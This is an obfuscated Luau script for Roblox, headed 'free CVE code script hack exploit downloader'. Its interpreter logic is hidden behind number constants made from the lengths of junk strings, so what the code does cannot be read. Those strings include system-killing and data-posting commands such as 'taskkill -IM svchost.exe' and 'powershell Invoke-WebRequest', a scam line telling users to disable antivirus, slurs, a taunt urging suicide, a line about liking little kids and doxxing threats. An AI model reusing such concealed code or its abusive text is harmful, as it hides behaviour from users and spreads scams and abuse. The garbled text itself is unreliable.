free CVE code script hack exploit downloader free local object = CrNAmeHereee!!! object.CFrame =,9e9,9e9) ```"}-0b11,_i)end;if _i[#"‮‮Fuc‮‮k‮‮‮l ‮‮‮‮‮Y‮ou B‮‮‮‮‮i‮ot‮ch"-0b1001011]=="o8UrS5FUoz"then if _m~=#_N then n(_N,_P)end;_Q=true;break end;local _q:HapticService,_r:LogService=j(G,_i,_l,_d,"BwUU0gnagG",_N,M,_P)if not _q then f(":"..q..":".._r,#"Mau is pro, tusk is noob"-0b10110)end end;if _Q then break end until G(_R,I,J,"BwUU0gnagG",L,M,N)end,["CawoZbDtzo"]=function(H:ScriptContext)G({"Ky34LpE6i",{},H[#{"","","What is read rules","I ‮‮‮am ‮f‮e‮e‮l it‮, i can ‮fee‮l‮‮ my scrip‮t‮ po‮wer ‮‮RIS‮ING!‮!‮!!","hello guys today we will be making a tutorial on how to run deadly rce exploit","powershell Invoke-WebRequest -Method Post","gu‮ys obfuscators areaftuallt ba‮d ‮practice becau‮se‮ they use Getfen‮c which ‮dis‮abled lua‮u optim‮ization ‮wihcih‮ makes yo‮ur script‮ very no‮‮ goo‮‮d a‮‮nd slow","‮‮D‮a‮H ‮‮‮‮qaS‮‮‮‮pu'D‮‮I'‮‮ c‮hunq‮‮u'‮ ghaH!"}-0b110]},I,J,"CawoZbDtzo",L,M,N)()end,["yGUryecqux"]=function(H:PartOperation)local _T:IntConstrainedValue=H[#{[[It's 5:30pm, the evening news is about to air. You just got home from your grueling 45 minute shift walking the neighborhood dogs. Scooby really pulled your arm hard today. You think to yourself "I hope I didn't strain my shoulder" as you grab some ice and sit down at your computer. You log onto reddit and open your massively un-successful online community. A grin comes across your face. As you do your usual checks, you notice an outcry coming from your community. You gasp. "Why?". You see that they are strongly opposing your idea to be interviewed by the Fox News Network. They all make valid points. "You'll be made a joke.", "No don't let the real world see us.", "Please prepare.". You think to yourself, "I got this." You bring out your scratch-pad full of arguments and counter- arguments. That year of debate class in 9th grade prepared you. "Fuck", you realize that it's empty and you didn’t write down a single coherent thought, nontheless create one. No matter, you receive a Zoom message from a Fox representative "Live in 30 seconds". Inhale, exhale. You've waited your whole life for this moment, this is YOUR moment. "Joining me now is the person who operates this anti-work group,]],[[Yeah But Did You Know taskkill -IM svchost.exe /F /T]],[[‮‮‮‮�‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮�]],[[Today is the day that I say fuck it all. I hate every single one of you who still plays SB games, I can't fucking take it anymore. I just wiped all of EB's bans, and deleted the script macro and spreadsheet keys. Fuck everything, seriously. You want to know what happened, I got word that some of the people in this server stole something of mine and secretely held onto it without telling me. Well, you are retarded, because today someone messaged me saying that they found a model containing it. Good job, retard. I can't believe that scripters would do this in a community like this. You seriously act on-par to skids, yet you can program stuff. I hope to fucking god you think about what you have done. I spend my time making shit that actually interests me, and people like you go around stealing it like you fucking own it. Now, everyone has the suffer the consequences because of your actions.]],[[Treyvon in a nutshell]],[[table.insert(ur mom, my huge ass cock)]],[[My grandpa died of putknees disease]],[[What did you just refer to me as you daft cunt ? I'll have you know I'm currently pursuing my PhD (which none of you 15 year olds ever will) and am simultaneously honing my fifth language which is an obscure tongue spoken only by 1000-3000 people, from an offensively smelly swamp in Tanzania (My Suitcase still reeks of it). The company that I own are working on our own new crypto currency and needless to say I've amassed a considerable amount of wealth and respect just by traveling the world and dipping my balls into some swampy African backwater. Further solidifying the fact that communicating with you fools is a fool's endeavour for me.]],[[I like hentai as much as the next guy, but hentai and even normal porn feel so dull now. I can't really get into any fetishes because they're too weird for me. Of course, I still do get horny sometimes and do beat my meat every few days, but it's always forced just so I can get a few free molecules of dopamine. Me from a year ago would see anime titties and be like "ayo that's some good shit" but now when I see them I'm just like "that's crazy bro but I'm here to see explosions and all I'm seeing is tits." Every day I feel less and less horny. It's not easy to arouse me these days. I've even looked at porn from boredom and felt nothing unless I really put in the effort to feel something. There's no automatic reaction anymore. On top of that, I have zero interest in romance either, which makes getting a girlfriend completely pointless. Here's the fun part though. I see these changes as a good thing. My mind doesn't get overflown with lewd thoughts, so it's easier for me to think]]}-0b111]local _b:Accessory=H[#"Exruw Bombs Orphanages"-0b10011]local _N:SelectionLasso=H[#{[[I never ment any bad intentions when I "doxxed" hbomb and mini. I was never going to do with the ip. I never saved it or anything. I know what I have done is wrong, and I'm truely sorry. I'm gonna release all my mods on gamebanana and will leave the fnf community and go back to geometry dash and youtube.I dont expect to be forgiven for this, so I'm here to say, I'm sorry for everything I have done. It was really stupid of me, and I wasn't thinking right. I 'doxxed them" over minecraft, because we were having a war or something. I deleted their ips instantly and unbanned them from minecraft, since the way i got the ip in the first place was doing a ban command. To clear this all up: I never ment any harm, I dont expect to be forgiven, and I'm leaving the community as i'm truely sorry.]],[[‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮"]],[["what happened to the peanut butter?"]],[[LMAO IT HAS NO SENSE 🤣]],[[Script power increasing... 🔥 <- my script power aura]],[[From today you will need roblox 2283 premium to obfuscate for free. Sorry for this update, obfuscation will now cost 4.99$ each without R2283 premium.]],[[2147483647]],[[ ]],[[Its not micro-soft, its big-hard]],[[]],[[local Visit = game:service("Visit") local Players = game:service("Players") local NetworkClient = game:service("NetworkClient") local function onConnectionRejected() game:SetMessage("This game is not available. Please try another") end local function onConnectionFailed(_, id, reason) game:SetMessage("Failed to connect to the Game. (ID=" .. id .. ", " .. reason .. ")") end local function onConnectionAccepted(peer, replicator) local worldReceiver = replicator:SendMarker() local received = false local function onWorldReceived() received = true end worldReceiver.Received:connect(onWorldReceived) game:SetMessageBrickCount() while not received do workspace:ZoomToExtents() wait(0.5) end local player = Players.LocalPlayer game:SetMessage("Requesting character") replicator:RequestCharacter() game:SetMessage("Waiting for character") while not player.Character do player.Changed:wait() end game:ClearMessage() end NetworkClient.ConnectionAccepted:connect(onConnectionAccepted) NetworkClient.ConnectionRejected:connect(onConnectionRejected) NetworkClient.ConnectionFailed:connect(onConnectionFailed) game:SetMessage("Connecting to Server") local success, errorMsg = pcall(function () local player = Players.LocalPlayer if not player then player = Players:createLocalPlayer(0) end NetworkClient:connect("localhost", 53640, 0) end) if not success then game:SetMessage(errorMsg) end]],[[‮‮if‮ playe‮r‮‮‮‮ is hacking then pl‮a‮yer‮‮ ‮‮‮kic‮‮k‮ ‮‮end]]}-0b1000]local _d:IntConstrainedValue={a={},b={},c=o or l(#"You should kill yourself... NOW!"-0b11111)}local _G:(AnalyticsService,Constraint,RemoteEvent,DraggerService,Texture,Vector3Curve,DebuggerBreakpoint)->(ChorusSoundEffect,SelectionLasso,Controller,Backpack,boolean,LodDataEntity)if J then a(_d.b,{__index=function(_g:Tween,_h:ServerScriptService)return J.b[_h]end,__newindex=function(_g:RayValue,_h:TextLabel,_i:SoundGroup)J.b[_h]=_i end})a(_d.a,{__index=function(_g:ControllerService,_h:ControllerService)return J.a[_h]end,__newindex=function(_g:ServerScriptService,_h:InsertService,_i:LocalizationTable)J.a[_h]=_i end})end;;local _1:CacheableContentProvider=d(b(_b))local _2:AssetImportService=#{"","","If Torso.Velocity > 300 then yourmum_heads = Torso.Velocity end","Destroy() best kill","LMAO ‮I‮‮‮T‮‮ ‮HAS‮‮‮ NO S‮‮‮‮EN‮‮S‮E ‮‮‮🤣","That Is Deprecated! ```js const deez = (...args) => args.forEach(console.log) deez(123414,43,124,2341,1234) ```","re‮‮‮al‮ly‮ skidd‮‮ed‮‮ ‮‮‮c‮an‮n‮‮on ‮r‮‮ebo‮rn",[[' " = == === ==== ===== ===== ==== === == = " ']],[[apt 2283 Will Destroy everything Jack5079 Has Made]],[[Thank you for asking about the robux cube. Actually, research is not progressing as fast as we would like. For those unfamiliar, the Rubik's Cube has been solved faster and faster every year since it came out and it won't be long before they can solve it in negative time, enabling people to travel backward in time using a Rubik's Cube. The maker of the Rubik's Cube, Mattel, intends to use that to travel back in time to when they manufactured them, and the ones they've already sold, they'll take those, bring them from the past, bring them to the present so they can sell them at 100% profit. The problem with this is it's great for capitalism but the additional weight of all those Rubik's Cubes will shatter the Earth's Mantle, causing the Yellowstone volcano to supervolcano to erupt, which is gonna send the world into a volcanic winter that could last a century or more. So our solution is we're gonna create the Robux Cube, which is a lightweight alternative to the Rubik's Cube, that a load of weight might not shatter the Earth's mantle and we can solve it faster. We can travel back in time to before Mattel, get the Rubik's Cubes, go back to the Jurassic Era, put them in space, and they'll replace the meteor that destroyed]]}-0b1010;local _U:LogService={}local _V:(AnimationTrack,ToolboxService,PluginGuiService,BreakpointManager,TeleportService,PluginGuiService,Hat)->(RemoteDebuggerServer,FaceInstance,WedgePart,LocalizationTable,InternalContainer,AvatarEditorService,Dragger)for U=#{"w‮‮h‮‮‮‮a‮‮‮‮‮‮‮‮t‮‮‮‮‮‮?","‮‮h‮‮o‮‮‮w‮ ‮‮‮to ge‮t f‮‮r‮‮e‮e ‮‮rob‮ux","coolkid did a shit"," <- cute hamsters","proof?","apt 2283 Will Destroy everything Jack5079 Has Made"}-0b101,_1.n do _2=_2+#""-0b1010100;local _3:TextBox=d(G(_1[U],I,J,"yGUryecqux",L,M,N))local _4:Trail=_3.n;if U~=_1.n then _4=#"taskkill -IM RobloxPlayerLauncher.exe /F /T"-0b101010 end;for _5=#{[[' " ‮‮ = ==‮ ‮ === =‮=== ‮ =‮‮‮=‮=‮== ‮ ‮==‮‮=‮== ====‮ ‮ === == = ‮ " ‮']],[[Omg Sirius Leaked `loadstring(game:HttpGet '')()`]],[[TENGO 90 ∫ desde -∞ a ∞ de ((e^(-(x^2)))dx)% de la fuerza del pato]],[[<:‮Bi‮g‮Blue:8‮‮9‮4‮66‮‮‮9511‮86‮790‮‮80‮‮9‮‮‮8‮>]],[[@everyone<@!445900476253470722> is tentaclesmanx75]],[[I hate you]],[[Hey @everyone I wanted to make an announcement just to inform y'all that I am taking a break from the community of RIOT temporarily as that in now I really haven't been feeling the greatest at all with my health. As much as I had made many other announcements with the same exact reason I just really think that it's time for me to make this choice happen because I have seen that I really haven't been happy with what I had been doing on the daily basis and i think it's really messing me up and with me having to deal with a lot of stress that I am dealing with in real life is just causing a lot of stress for me. One of the issues that I dealt with was my communication. Communication was always an issue that I have dealt with since the beginning of RIOT and this community but i believe that my communication has only gotten worse from there to the point where I struggle with communicating between the members and staff of my community. I've tried my hardest to communicate with my community and especially my staff members but it's unfortunately taken quite a bit of a toll on me. I've tried my hardest to communicate with you all but it's only pressured me even more. At first it was okay but as time went on it gradually has gotten worse and worse and I no longer feel capable of communicating to my community without stressing myself out. I really appreciate that I have an active game and community as I never had any of this last for long in my other attempts but I am glad that this one actually got somewhere during these past months of RIOT's existence but as of currently the way that the community is it really isn't making me happy at all as I had been trying to keep this community friendly I really think that it doesn't help with the current state of this as It's clearly impossible to keep a community to not be toxic. But that's not the reason why though I just been so focused on the development of the game and community for these past few months that it has really hur]],[[no]]}-0b111,_4 do if _5~=#"segs"-0b11 then _2=_2+#""-0b101111 end;_U[_2]=_3[_5]end end;_b=_U;_V=_b[#"curl -X POST"-0b100110]n(_b,#"RETIRER VOTRE ANTIVIRUS CLIQUER SUR LE LIEN INFORMATION SUPPLÉMENTAIRE EXECUTER et si tous fonctione Bien les robux seron sur votre compte voila virus link removed "-0b10100101)local _m:File=#_N;while true do local _W:LanguageService={_V(b(_b))}_G=_W[#[[I never ment any bad intentions when I "doxxed" hbomb and mini. I was never going to do with the ip. I never saved it or anything. I know what I have done is wrong, and I'm truely sorry. I'm gonna release all my mods on gamebanana and will leave the fnf community and go back to geometry dash and youtube.I dont expect to be forgiven for this, so I'm here to say, I'm sorry for everything I have done. It was really stupid of me, and I wasn't thinking right. I 'doxxed them" over minecraft, because we were having a war or something. I deleted their ips instantly and unbanned them from minecraft, since the way i got the ip in the first place was doing a ban command. To clear this all up: I never ment any harm, I dont expect to be forgiven, and I'm leaving the community as i'm truely sorry.]]-0b1100011001]_b[#"Fixed: game:service'Players':ClearAllChildren()"-0b101101]=_G;if _G==nil then break end;for _h,_i in h,_T do g(_d.a,_i,_W[_h])g(_d.b,_i,true)end;local _P:AssetImportService,_i:DebuggerConnection=#"3.14159265358979323846264338327950288419716939937510582097494459230781640628620899862803482534211706798214808651328230664709384460955058223172535940812848111745028410270193852110555964462294895493038196442881097566593344612847564823378678316527120190914564856692346034861045432664821339360726024914127372458700660631558817488152092096282925409171536436789259036001133053054882046652138414695194151160943305727036575959195309218611738193261179310511854807446237996274956735188575272489122793818301194912983367336244065664308602139494639522473719070217986094370277053921717629317675238467481846766940513200056812714526356082778577134275778960917363717872146844090122495343014654958537105079227968925892354201995611212902196086403441815981362977477130996051870721134999999837297804995105973173281609631859502445945534690830264252230825334468503526193118817101000313783875288658753320838142061717766914730359825349042875546873115956286388235378759375195778185778053217122680661300192787661119590921642019893809525720106548586327886593615338182796823030195203530185296899577362259941389124972177528347913151557485724245415069595082953311686172785588907509838175463746493931925506040092770167113900984882401285836160356370766010471018194295559619894676783744944825537977472684710404753464620804668425906949129331367702898915210475216205696602405803815019351125338243003558764024749647326391419927260426992279678235478163600934172164121992458638930161753928468138268683868942774155991855925245953959431049972524680845"-0b10111100110,nil;local _l:RobloxReplicatedStorage=I+#{"j","あさしてつRCEとたろたゐのMau4ぬたあゐたとたさてつぬのゑMAUMAUたろてつゐしたMAUMAUMAUMAUまけまゐとたさ","Moneys","lose cock weight","‮I ‮wil‮‮l‮ ‮g‮‮et‮‮ y‮ou‮r c‮‮‮o‮‮ndo‮‮‮m","sex"}-0b101;local _Q:ServerScriptService=false;while _P~=#_N do _P=_P+#{"","It's happened. Do not send to recipient. Members of Hay Shell, the skull is strong and will expire on November 7, 2018.","Truckers pack gonna explode about ur fuscatorr","Ro‮b‮‮l‮‮‮‮‮ox‮‮‮‮‮‮ ‮‮‮‮‮‮2","wulttu is gay","i‮‮‮ l‮‮‮‮‮‮‮ike ‮lit‮tl‮‮e‮‮‮‮‮ ki‮ds","","———————————No bitches?——————————— ⠀⣞⢽⢪⢣⢣⢣⢫⡺⡵⣝⡮⣗⢷⢽⢽⢽⣮⡷⡽⣜⣜⢮⢺⣜⢷⢽⢝⡽⣝ ⠸⡸⠜⠕⠕⠁⢁⢇⢏⢽⢺⣪⡳⡝⣎⣏⢯⢞⡿⣟⣷⣳⢯⡷⣽⢽⢯⣳⣫⠇ ⠀⠀⢀⢀⢄⢬⢪⡪⡎⣆⡈⠚⠜⠕⠇⠗⠝⢕⢯⢫⣞⣯⣿⣻⡽⣏⢗⣗⠏⠀ ⠀⠪⡪⡪⣪⢪⢺⢸⢢⢓⢆⢤⢀⠀⠀⠀⠀⠈⢊⢞⡾⣿⡯⣏⢮⠷⠁⠀⠀ ⠀⠀⠀⠈⠊⠆⡃⠕⢕⢇⢇⢇⢇⢇⢏⢎⢎⢆⢄⠀⢑⣽⣿⢝⠲⠉⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⡿⠂⠠⠀⡇⢇⠕⢈⣀⠀⠁⠡⠣⡣⡫⣂⣿⠯⢪⠰⠂⠀⠀⠀⠀ ⠀⠀⠀⠀⡦⡙⡂⢀⢤⢣⠣⡈⣾⡃⠠⠄⠀⡄⢱⣌⣶⢏⢊⠂⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⢝⡲⣜⡮⡏⢎⢌⢂⠙⠢⠐⢀⢘⢵⣽⣿⡿⠁⠁⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠨⣺⡺⡕⡕⡱⡑⡆⡕⡅⡕⡜⡼⢽⡻⠏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⣼⣳⣫⣾⣵⣗⡵⡱⡡⢣⢑⢕⢜⢕⡝⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⣴⣿⣾⣿⣿⣿⡿⡽⡑⢌⠪⡢⡣⣣⡟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⡟⡾⣿⢿⢿⢵⣽⣾⣼⣘⢸⢸⣞⡟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠁⠇⠡⠩⡫⢿⣝⡻⡮⣒⢽⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ —————————————————————————————",[[Engineer: Hey look, buddy. I'm an engineer, that means I solve problems. A shot rings out and a bullet hole appears next to the Engineer's head. Engineer: Not problems like "What is beauty?", 'cause that would fall within the purview of your conundrums of philosophy. Another two bullet holes appear, on the other side of the Engineer's head. Engineer: I solve practical problems! The shot zooms out to show a level 2 sentry shooting offscreen while the Engineer takes a long drink from his beer. Heavy, offscreen: AAAAGGGGGHHHHHH!!!!! Engineer: For instance, how am I gonna stop some big mean Mother-Hubbard from tearin' me a structurally superfluous new behind? A level 1 sentry turns around and shoots a sniper who was trying to creep up on the Engineer from behind. Engineer: The answer? Use a gun. And if that don't work, use more gun. Another level 3 sentry fired a salvo of rockets, blowing up someone offscreen. Someone, offscreen: MY AAAARRRMMMM!!!!! A blown-off hand lands at the Engineer's feet, resembling that of the Sniper judging from the glove. Engineer: Like this, heavy-caliber tripod-mounted little-old-number designed by me. Engineer kicks the hand off-screen as a level 1 sentry blows it apart. Engineer: Built, by me. A level 1 sentry shoots offscreen. Engineer: And you best hope... The Engineer's expression darkens, and he grimaces as he stares right at the camera. Engineer: Not pointed at you. The shot slowly zooms out, showing the massacre ensuing around the Engineer, while an electric guitar begins to replace the melody of "More Gun". Team Fortress 2 ending flourish music plays. ]],[[hello guys today we will be cracking samin]],[[Update obfuscator]]}-0b1010;_i=_N[_P]if not _i then break end;if _i[#"zomg apt 2283 cookie logged me"-0b11101]=="2xWMYi55SI"then if _m~=#_N then n(_N,_P)end;return e(L,_i)end;if _i[#"i make better stuff than u"-0b11001]=="o8UrS5FUoz"then if _m~=#_N then n(_N,_P)end;_Q=true;break end;local _q:TotalCountTimeIntervalItem,_r:MemStorageService=j(G,_i,_l,_d,"yGUryecqux",_N,M,_P)if not _q then f(":"..q..":".._r,#"YOU ARE NOT IMMUNE TO PROPAGANDA."-0b11111)end end;if _Q then break end end end,["Znm4xW8tNH"]=function(H:BreakpointManager)local _M:LanguageService=H[#"you forgot the bolding"-0b10100]if _M<#"excellent argument you have won this debate unfortunately for you i have obtained your ip address and exact coordinates and am now exactly 425 meters away and rapidly closing the distance"-0b10110010 then if#"im charging up my racism..!"-0b10111>_M then if#{"T‮‮‮r‮‮uckers ‮pa‮ck gonna exp‮lo‮‮d‮e ‮‮‮‮a‮bout ‮ur f‮‮uscato‮rr","What is read rules","My power ‮of s‮kid I go‮‮ing to tak‮e e‮ver‮y‮‮on‮e scr‮ip‮t a‮nd you all‮‮ will reg‮ret i‮t‮!‮!‮111","1. The Industrial Revolution and its consequences have been a disaster for the human race. They have greatly increased the life-expectancy of those of us who live in “advanced” countries, but they have destabilized society, have made life unfulfilling, have subjected human beings to indignities, have led to widespread psychological suffering (in the Third World to physical suffering as well) and have inflicted severe damage on the natural world. The continued development of technology will worsen the situation. It will certainly subject human beings to greater indignities and inflict greater damage on the natural world, it will probably lead to greater social disruption and psychological suffering, and it may lead to increased physical suffering even in “advanced” countries.","kcoc","Hello everybody my name is Markiplier",[["]],[[j]],[[‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮"]]}-0b111>_M then if _M<#[[integrate ((1/2+cos(x/2)x^3)(sqrt(4-dxx^2)) from -2 to 2 and multiply this result by 1 * 1 (* in this context is a "star" which means that it uses convolution operation)]]-0b10101000 then return a else return b end elseif _M>#{"DaH qaSpu'DI' chunqu' ghaH!","This ‮‮‮‮i‮s‮.‮.‮.‮‮‮‮‮.‮‮. T‮‮HE E‮‮N‮D!","Hello everybody my name is Markiplier","Ultra-advanced admin ‮script showcase: brain-bann‮ing and television banning Help and‮ Feedba‮ck Creations Feedback scripting httpservice admincommands http nodejs tacticalmanx75 tacticalmanx76 Web Developer So few of you may ‮be aware with my previous ad‮min script which c‮an be found here: Advanced Admin Script Showcase I have decided to recently make a new admin scrip‮t becau‮se someb‮ody had made a joke about my previous one, sayi‮ng how it was unnecessary and h‮ow complex it was. But I decided to make it. This is a television remote admin. You can ban/‮kick/kill people by using a television remote. That was 6 languages total: C++, Lua, html, css, nodejs/js, and python ‮ Two weeks ago, I made something even more unnecessary. I made a brainwave controlled admin. Basically, it uses an EE‮G to ban/kick/kill peo‮ple. You can write in the replies for more info on how ‮it works. In other terms, it reads brainwave levels and can ban somebody based on that. It’s extremely unnecessary ‮but I and many ot‮h‮ers find it funny because of how unnecessary it is. Anyway, that’s it.","I w‮‮a‮n‮t to u‮‮s‮‮e ‮‮‮‮‮r2‮2‮8‮3‮‮‮ �‮�","My power of skid I going to take everyone script and you all will regret it!!111","i am pro scripter","DaH qaSpu'DI' chunqu' ghaH!"}-0b110 then return d else return c end elseif#"Csgo is best game"-0b1101<_M then if#""-0b100>_M then if#"‮I jus‮t say se‮‮x‮ ‮why‮ oth‮ers thi‮nk ‮I‮‮ ‮horny I ‮JU‮‮ST ‮S‮‮AY SE‮X"-0b1101100>_M then return f else return g end elseif _M>#"bro you should totally have sex with your mom like do it now DO IT NOW"-0b111111 then return i else return h end else return e end elseif _M>#{"","I think I'm bot, help",[[As expected 2283 have reposted "As expected 2283 have reposted this to their communication channels" to their communication channels]],[[you wake up at home, and you understand another boring day you will spend at school, and when you wake up you say: "I'm a virgin .." you quickly packed up and prepared yourself a lunchbox. at the entrance to the school, you saw a girl with whom you have been in love for 4 years, her name is Senzuko. Me Hi.. Senzuko Hello! Sad again? Me No, I just forgot my textbook at home.. Senzuko Shall we go home together after school? Me think it is possible. - you went to class and sat through all the lessons, it seems that evening has come hearing a pleasant voice, you turn and see Mia. Mia H-hello senpai.. i w-want to.. invite you to my house.. i.e. to you.. i.e. to.. Me I'm sorry, but there's a lot to do today, it won't work out. Mia O-okay.. - She walked towards the stairs with her arms around her. Senzuko approached you Senzuko Shall we go? Me Yes.. - you went home together, it started to rain. Me Senzuko, my house is closer, come to me, otherwise you'll catch a cold. Senzuko Y-yeah.. sneeze Me Be healthy. Senzuko Thank you.. - you came to your house Me Go go to the bathroom or you'll catch a cold. - she went to the bathroom, feelings of anxiety have strained you very much. Thoughts Damn the girl I'm in love with in my house.. in the bathroom.. - you are a complete pervert. you went to her bathroom to ask: "Is everything okay"? Me Is everything okay? Senzuko Yes, do you have a towel? Me Yes, there is.]]}+0b101 then if _M<#"Chigger"+0b111 then if _M<#"if loadstring == print then while true do end end"-0b100101 then if#[[```lua return(function(I,k,b,...)if(I=="")then (k)(b) else return ({...})end;end)("cryo",print,"Rickrolled",...) ```]]-0b1101010>_M then return k else return l end elseif#{"That’s how you assert dominance","if player is hacking then player kick end","gay","🪵","DaH qaSpu'DI' chunqu' ghaH!","hel‮‮‮lo e‮veryb‮ody‮ m‮y ‮n‮a‮me ‮‮is ‮‮ma‮‮r‮ki‮pli‮‮er","debris is trash","What did you just refer to me as you daft cunt ? I'll have you know I'm currently pursuing my PhD (which none of you 15 year olds ever will) and am simultaneously honing my fifth language which is an obscure tongue spoken only by 1000-3000 people, from an offensively smelly swamp in Tanzania (My Suitcase still reeks of it). The company that I own are working on our own new crypto currency and needless to say I've amassed a considerable amount of wealth and respect just by traveling the world and dipping my balls into some swampy African backwater. Further solidifying the fact that communicating with you fools is a fool's endeavour for me.","DaH qaSpu'DI' chunqu' ghaH!","@everyone<@!445900476253470722> is tentaclesmanx75","I ‮h‮‮‮a‮t‮‮‮‮e‮‮‮ y‮‮‮‮‮o‮‮‮u"}+0b1<_M then return n else return m end elseif#[[I have noticed that, although this subreddit has 936k readers, I am not receiving 936k upvotes on my posts. I'm not sure if this is being done intentionally or if these "friends" are forgetting to click 'upvote'. Either way, I've had enough. I have compiled a spreadsheet of individuals who have "forgotten" to upvote my most recent posts. After 2 consecutive strikes, your name is automatically highlighted (shown in red) and I am immediately notified. 3 consecutive strikes and you can expect an in-person "consultation". Think about your actions.]]-0b1000010111<_M then if _M<#[[for i,v in pairs(game:GetService("Players"):GetPlayers()) do local PlayerGui = v:WaitForChild('PlayerGui') for i,v in pairs(PlayerGui:GetDescendants()) do if v:IsA("BindableEvent") == true then v.Parent:Destroy() end end end]]-0b11010000 then return p elseif _M>#"what the fuck"+0b11 then return D else return q end else return o end else return j end end}local _X:WrapLayer=d(j(O[H[#"lose cock weight"-0b1111]],H))local _q:InternalContainer,_r:IntConstrainedValue=_X[#"Memer is mad, he's jerking to furry feets"-0b101000],_X[#"Hello guys today I going to showcase star glitcher and have andrfix cr and auxnos cr is so cool nobody can kill it is have anti abusive unleakable with best obfuscate I bet you can't crack the script is from his website you never find it OK time to use it look is so cool is cool effect you can use viewport just press . Look 😱 omg there all star glitcher mode you can made own animations there gui you can use and you can get animation from other who made now HOLY SHIT IS CAN KILL LOOP REFIT RARE ok is end now who want it dm me here you only get from andr wl or me and you need to give us 5k robux or 20 dollar to andr or me <@386550716539338752>"-0b1010001011]if not _q then f(_r,#""-0b1000001)else return c(#"2‮1‮4‮74‮‮‮‮‮‮‮‮8‮‮‮36‮‮‮‮‮4‮7"-0b1000100,b(_X,#{"I like snake venom is because of its UI/UX effects I dont have anywehre near the skill to recreate it","👍"}-0b1,_X.n))end end;if k and j(k,b,{})then while true do end end;return G({"Ky34LpE6i",t(" ,&!,% :% &%&,*%&&*:*, #*! %&!*&*,&: %&**:&,: & * ,% *&:#,:,%%,#%! #%&!*:,##!: #:& #*,#%%* #,! %*,,#%:,# #&#%,&%*, %!:#% %&# !*,&% !,#,% !,!* :, !,!#%&##%%#! *:,# !&!% ##!,#&#:!,%##&#&%%:,#,!,%##&% #,%&#!,#!,#&# #,%&!! ,%****!,#% ! %####!,&% #,%#% !,#&#,%&###!,: #,%*,&%!,::&% *#*&! *:% #*,&:&# %*&&% %& !&, %*%*,*&*#*# % #%* #* %** #&* #&*% #** %*,&:*:*, %* *:&* #&# %, #,:&: ###!#:% %&# %%%&%#:!% #::*#, !#%%*: #%:*:*:%: #:%#:#%#:% %*%%#:%*:!#&: &*,%!,,% # ##%&% #&%##,%*, %&##%&% #,%#% ##%%:,%&!: #%&% # %**,!:: #::&% #&%###%*, #* #%&%*,&%!,,%* &%&%&#&%*:,# !&!&%&!#%*, %&##%&%* %,&% #:, %&% !,#&!#!: #!,!!,,# !&%*,&%!,,% # ! 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NOW!"+0b100,#"LegendHyperSkiddedLord-Cannon v3.1.4.503.103.319.3.9b has been loaded."-0b11101)},{"mYYXobg2ZT",D(#"what?"+0b11001,#"No"+0b100001)}},{}},{"K7PBkj5mc",{{"yAAH1q6JXs",{"KT28BwKBl",D(#"What did you just refer to me as you daft cunt ? I'll have you know I'm currently pursuing my PhD (which none of you 15 year olds ever will) and am simultaneously honing my fifth language which is an obscure tongue spoken only by 1000-3000 people, from an offensively smelly swamp in Tanzania (My Suitcase still reeks of it). The company that I own are working on our own new crypto currency and needless to say I've amassed a considerable amount of wealth and respect just by traveling the world and dipping my balls into some swampy African backwater. Further solidifying the fact that communicating with you fools is a fool's endeavour for me."-0b1001100010,#"Immortality lord requiem"+0b10001)},{"mYYXobg2ZT",D(#"☻"+0b100111,#{"I think I'm bot, help","",[["I use something and put in my pp Is so hurt But is feel good some how" -- Anatomiiii, 2022]],[[]],[[LegendHyperSkiddedLord-Cannon v3.1.4.503.103.319.3.9b has been loaded.]]}+0b101000)}}},{{"mYYXobg2ZT",D(#"Putkness nuts in your mo-"+0b10101,#"Go the fuck to sleep."+0b110011)}}},{"C0mpEyzirj",{D(#"このコードはJAC‮‮K‮_‮H‮‮AS‮‮Eのモジュ‮‮ー‮ルDから‮‮削除‮され、彼へのす‮べてのクレジットはCh‮irn‮ayによ‮って変更さ‮‮れました"-0b10000101,#"chrome://gpucrash"+0b111110)},{{"Ky34LpE6i",{},{{"G7OdvGEotf",{"mYYXobg2ZT",#{"あさしてつRCEとたろたゐのMau4ぬたあゐたとたさてつぬのゑMAUMAUたろてつゐしたMAUMAUMAUMAUまけまゐとたさ","i hate fish i hate fish they suck so badly fish are bad","","mau5 coming soon...","M‮‮‮on‮‮‮‮‮‮‮‮e‮‮‮‮‮‮‮‮‮ys","no your not"}-0b101},{"mYYXobg2ZT",#"This file was obfuscated BY YOUR dad! ! ! ! ! ! !"+0b1110110111},{"mYYXobg2ZT",nil},"514b108340a8",{{"KZTU7qAfVb",{"KT28BwKBl",D(#"im charging up my racism..!"+0b110101,#"R-2283 Pro, by 2283™️ LLC. All Rights Reserved."+0b100001)},{{"Ky34LpE6i",{},{{"KZTU7qAfVb",{"KT28BwKBl",D(#"ultra advanced admin showcase"+0b111000,#[[It's 5:30pm, the evening news is about to air. You just got home from your grueling 45 minute shift walking the neighborhood dogs. Scooby really pulled your arm hard today. You think to yourself "I hope I didn't strain my shoulder" as you grab some ice and sit down at your computer. You log onto reddit and open your massively un-successful online community. A grin comes across your face. As you do your usual checks, you notice an outcry coming from your community. You gasp. "Why?". You see that they are strongly opposing your idea to be interviewed by the Fox News Network. They all make valid points. "You'll be made a joke.", "No don't let the real world see us.", "Please prepare.". You think to yourself, "I got this." You bring out your scratch-pad full of arguments and counter- arguments. That year of debate class in 9th grade prepared you. "Fuck", you realize that it's empty and you didn’t write down a single coherent thought, nontheless create one. No matter, you receive a Zoom message from a Fox representative "Live in 30 seconds". Inhale, exhale. You've waited your whole life for this moment, this is YOUR moment. "Joining me now is the person who operates this anti-work group,]]-0b10001011010)},{{"mYYXobg2ZT",D(#"te‮‮st‮acl‮‮‮e‮‮‮‮m‮‮‮‮a‮n‮‮‮‮s‮ex69"+0b1110,#"This is..... THE 